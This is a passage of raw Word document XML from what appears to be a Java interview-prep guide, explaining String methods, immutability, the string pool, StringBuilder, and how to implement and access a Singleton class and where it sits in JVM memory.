        <w:t>: Removes leading and trailing whitespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753D451"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3 = "   Hello   ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604E04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3.trim()); // Output: Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141D9848"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CharSequence oldChar, CharSequence newChar)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces all occurrences of a substring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E67BF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replace("e", "a")); // Output: Hallo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2588B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ringBuilder and StringBuffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA88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e String class is immutable, there are other classes lik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Not synchronized and thus faster than StringBuffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700403CB"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Synchronized and thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651277B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StringBuilder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108749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311898F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17B00D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b.toString()); // Output: Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580F1AF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Performance of String Concatenation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5689475F"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 operator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: String concatenation using + creates a new String object each time, which leads to memory overhead and is inefficient in a loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83EDB6"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Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F435607"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 World";  // Inefficient for large concatenations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15482E93"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ing StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More efficient as it modifies the string without creating new objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2F83B0"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72DBB8F2"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72531D16"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nterning of Strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798FDAE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also has a special method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which can be used to return a canonical representation of the string. If the string is already in the string pool, it returns the existing string reference; otherwise, it adds the string to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD271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F612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0DB28EC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intern();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B24A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Output: true (same reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A10C2"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Using String Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C41A0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CA971B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7CAE9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Java";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294264F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Java";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7327511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5E832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literal comparison (String Pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB02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16F163B5" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458ADB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with new keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06ADE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Java");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A495F7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE114A6" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E227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s from String class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303FC8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 Hello, World! ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB6A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rim()); // Output: Hello, World!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F4D2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length()); // Output: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09803C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substring(7, 12)); // Output: World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AFC1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oUpperCase()); // Output: HELLO, WORLD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E0E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replace("World", "Java")); // Output: Hello, Java!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D6DA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838C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A3DB9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2C8852"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Once a String is created, its value cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0576A8C7"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A pool to manage memory efficiently for String literals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34359EDA"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String Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use StringBuilder or StringBuffer for concatenation and manipulation in a loop or frequent modification scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BF2C1"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de Range of Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: String provides a rich set of methods to perform various string operations like comparison, extraction, transformation, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC0753" w14:textId="362C9B9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5AA8D">
          <v:rect id="_x0000_i1230" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA2971" w14:textId="4D9BDBA0"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5" w:name="_Toc197867299"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a special feature of String</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w14:paraId="0CA00AA6" w14:textId="32C2BC6C" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="00161B6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ecial feature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the String class in Java is its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This means that once a String object is created, its value cannot be changed. Here are the key aspects of this special feature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5457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 of Strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505D04D"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the state of a String object cannot be changed once it is created. Any operation that appears to modify a string actually creates a new String object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B14E222"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vides several benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33E2C2"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Multiple threads can safely share and use a String without synchronization, as it cannot be modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EECFD"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Since String objects cannot be altered, they are more secure in contexts such as database queries, network communication, or as keys in hash maps, where their values must remain consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66268ECF"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ptimization</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which can help improve memory usage and reduce overhead by reusing string literals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7041806D"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String Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE8BEA6"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s a special area of memory in the Java heap where string literals are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE6B341"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String literal is created, Java first checks whether the string already exists in the pool. If it does, it reuses the existing string reference, thereby saving memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77B35C"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7E2895BA"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76050172"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39155C70"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true, both refer to the same object in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03880F6E"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create a String using the new keyword, it may be placed in the heap, but you can also intern it to store it in the String Pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4A12A"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fficient Memory Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3367968F"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the JVM can optimize memory usage and reduce the number of objects created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2807BEAC"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pool allows the reuse of identical strings, saving memory for large applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A9457"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Concatenation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889AEDD"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oncatenate strings using the + operator, a new String object is created for every concatenation. This is because String is immutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75062548"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multiple concatenations are done inside loops, it's better to us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to avoid creating too many intermediate String objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D1229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quals and Hashcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2794E6"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overrid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s from the Object class to compare strings based on their values, not references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72882A4C"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strings with the same content have the same hash code and are considered equal, which is critical when strings are used as keys in hash-based collections like HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB916E"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fficiency in Search Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897117C"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ings are immutable and their state cannot be altered, operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>search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ttern matching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are made faster, especially when combined with string pooling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686AADF"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mmutability also makes them ideal for use as keys in collections like HashMap, where consistency is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67560B45"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AFB433C" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 objects are immutable, they are inherently thread-safe, meaning they can be safely used by multiple threads simultaneously without additional synchronization mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F4796"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07A29D3"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9A33F72"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6C5D04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  // Created in the string pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD51CA6"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  // Reused from the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B8DDC1"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Hello");  // Created in the heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FF999" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B73D2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2 refer to the same object in the pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B28B9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77A2DC93" w14:textId="77777777" w:rsidR="00DC1EC8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DC1EC8" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF4EBB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3 refer to the same object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780480B5"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 (str3 is in heap, str1 is in the pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA91C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480444"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D897A4"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23E60F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mmutable nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the String class is the defining feature, which provides benefits such as thread safety, memory optimization, and reliable equality checks. The use of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further enhances efficiency by reusing string literals across the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C2DEB" w14:textId="0D485007"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2B7">
          <v:rect id="_x0000_i1231" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B30DE" w14:textId="3DE2C1F3"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6" w:name="_Toc197867300"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How to access Singleton class from another class</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="4601C1C0" w14:textId="74EB2430" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="004C616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a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from another class in Java, you follow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The main idea behind this pattern is to ensure that a class has only one instance and provides a global point of access to that instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72C6E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implement and access a Singleton class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A466CAE"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Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC42F58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43591E88"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reference to itself and a private constructor to prevent instantiation from outside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF51FE5"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a public method (typically named getInstance()) to get the instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D581E2"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ingleton Class from Another Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4B850"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ther class can access the Singleton instance by calling the getInstance() method of the Singleton class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F764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E8875C"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 Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DB6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05E049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1: Create a private static instance of the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1DB1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709F8F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6406C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2: Make the constructor private so it cannot be instantiated from outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64AB6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3D0F6CB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logic (if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CACF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84F7A" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2DEFF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3: Provide a public static method to get the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C69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393F43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B1D95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f the instance is null, create a new one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491002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633F87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E08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turn the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE6233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E2C6D5" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F2B3E4"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method to demonstrate some functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEC1BD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65F554D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0FC54DA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41797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DE2DC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Access Singleton from Another Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F6A8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BF5EC0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6D54A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 using getInstance method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1154C7C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7C802F7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91DA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showMessage method of the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE45A0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95E92C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3122F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firming that it's the same instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44178618"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5580262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 singleton2); // true, both refer to the same instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304575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C9B5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6159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D878532"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static instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The instance field is static and private, meaning only the Singleton class can access it directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D973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 constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The constructor is private, so no other class can directly instantiate a Singleton object using new Singleton().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B701BA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static getInstance() method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This method checks if the instance is already created. If not, it creates a new one. This ensures that only one instance of the class exists (singleton). It returns the single instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2F393"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the Singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In the Main class (or any other class), you can access the Singleton class by calling Singleton.getInstance(). This ensures that no matter how many times you access it, you'll always get the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA7109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3334D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1220361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78C874CF"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D362295"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ensures only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class is created throughout the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D991DB"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ccess the instance using the getInstance() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BD75B3"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lazily initialized, meaning it is only created when it is needed for the first time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571A9D0" w14:textId="6B6D8E53"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F689F">
          <v:rect id="_x0000_i1232" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4AECA" w14:textId="0A91656E"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7" w:name="_Toc197867301"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will the Singleton class be stored in memory</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="2467815F" w14:textId="2A8784A4" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="00F61E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because it is an object created during runtime. Specifically, the instance of the Singleton class is creat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when it is first accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DAD2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and where the Singleton class is stored in memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C00E88"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lass Definition (in the Method Area/Metaspace):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA3CDE"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loaded into memory by the JVM, its class definition (metadata)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in older versions of Java, this was part of the PermGen space; from Java 8 onwards, it's part of Metaspace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FDD2BB"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Area/Metaspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains information about the class, including its methods, fields, and other metadata. This is shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A5815"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ngleton Instance (in the Heap Memory):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1061D2C2"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tself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The heap is where all objects in Java are allocated at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF07A4"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Singleton.getInstance(), the first time, the instance is created in the heap memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34DAAB"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stance is already created, it simply returns the reference to the existing instance (no new object creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5C5E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tance Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475615E"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to the Singleton instance (e.g., instance in the getInstance() method)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as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06252D24"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ference variable is typically a static variable in the Singleton class, meaning it's shared among all invocations of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41775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arbage Collection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B7C4C"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like other objects in Java, will remain in memory until it is no longer referenced and is eligible for garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C64F2"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C98ACD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82C30FD"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reference to the single instance of the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626035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FE4BBF8" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250BCA8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5066323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 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0CA75" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6283D4FA"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instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E590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DF9619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320C83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 // Created in the heap memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE16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0A8373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ference is returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B59C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FF9A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D68D3F4" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69983BE3"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03E64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98136F"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192E67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1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244B8C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014D3C4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EC797"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1 == singleton2); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BA42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A454C6"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51CBA"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Storage Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BDB85"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like method definitions, fields, etc.)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Metaspace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30614FE3"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instance object</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204297C0"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ference to the Singleton instance</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35C463E3"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A38CBB6"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s only created once and resides in the heap memory after the first call to getInstance().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBF38F"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s static reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
